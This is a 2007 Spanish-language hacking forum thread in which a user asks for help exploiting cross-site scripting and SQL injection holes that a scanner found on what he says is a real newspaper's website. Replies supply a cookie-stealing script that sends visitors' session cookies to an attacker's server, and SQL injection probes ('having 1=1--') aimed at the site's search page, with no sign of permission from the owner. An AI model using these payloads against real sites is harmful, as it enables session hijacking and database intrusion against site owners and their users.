xss encontrado en web(como sacar provecho?)

Iniciado por Tengu, 17 Julio 2007, 22:03 PM

0 Miembros y 1 Visitante están viendo este tema.

Tengu

hola eh encontrado la siguiente falla en una web y tal vez esta web sirva como ejemplo para poder explicar la explotacion de un bug de alta importancia,para asi poder aprender de forma practica, asi q espero coolaboracion para que los q realmente saben y si no les molesta instruyan de su conocimiento a un monton de newbies igualmente desde ya se agredece su colaboracion.
bug:con acunetix aparece el mensaje de 11 xss en el index.php
Attack details
The GET variable nuevo_ano has been set to >"><ScRiPt%20%0a%0d>alert(1981921819)%3B</ScRiPt>.
espero su ayuda y conocimiento para liberar la informacion jej salu25

Encuentros por Video y Chat !!

Azielito

Pues ahí te dice donde esta la vuln [...]

Busca mas abajo del foro (creo que en documentacion) sobre 'los poderes secretos de XSS' escrito por SDC y las dudas que tengas ya se vera la respuesta ;)

wizache

Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link

Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos

berz3k


si fuese un foro, un banco o un lugar donde esten registrados users, seria interesante explotar el XSS, aunque hay otras tecnicas interesantes como el documento que saco sdc para explotar dichos bugs.

-berz3k.


Tengu

gracias por interesarse en ayudarme, ya estuve siguiendo los consejos y me adentre en el tema, el bug pertenece al servidor de un diario corriendo un Microsoft-iis/5.0 el cual posee unas 26 vulnerabilidades de xss y 5 de sql injection.
Lo que estudie a fondo fue el tema del xss pero logre descubrir que se trata de un xss ocal,es decir que el script no llega al servidor sino que solo se injecta codigo en el navegador lo que seria util pero solo si se mandara el link maliciosamente modificado a un usuario para ejecutar codigo. pero como dije antes ,no es posible una injeccion del tipo 2 en el formulario del servidor.
Tembien tiene WebDav activado,
y la vulnerabilidad en sql afecta a http://www.vulnerable.com:80/search.asp?bqd=111-222-1933email@address.com&oper='
uds. diganme que les parece. salud25 y otra vez GRacias

Encuentros por Video y Chat !!

wizache

Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes

SAludos

Tengu

la respuesta q devuelve es

                    Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

                    El controlador ODBC no admite las propiedades solicitadas.

                    /search.asp, line 106

Encuentros por Video y Chat !!

wizache

mm. ese error es nuevo para mi, siempre te regresa el error?, o en que casos, otra pregunta, el tipo de valor que toma "oper" por defecto cual es? una cadena o un entero

Tengu

si9 alguien logra saber a que se debe este error porfavor haganmelo saber jej

Encuentros por Video y Chat !!

yeikos

Cita de: tengu..::Fireb0y::.. en 20 Julio 2007, 17:52 PM
la respuesta q devuelve es

                    Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

                    El controlador ODBC no admite las propiedades solicitadas.

                    /search.asp, line 106


Ese error se debe a que la sintaxis de la consulta es incorrecta, prueba a reconstruirla de nuevo siguiendo los consejos que te dió wizache.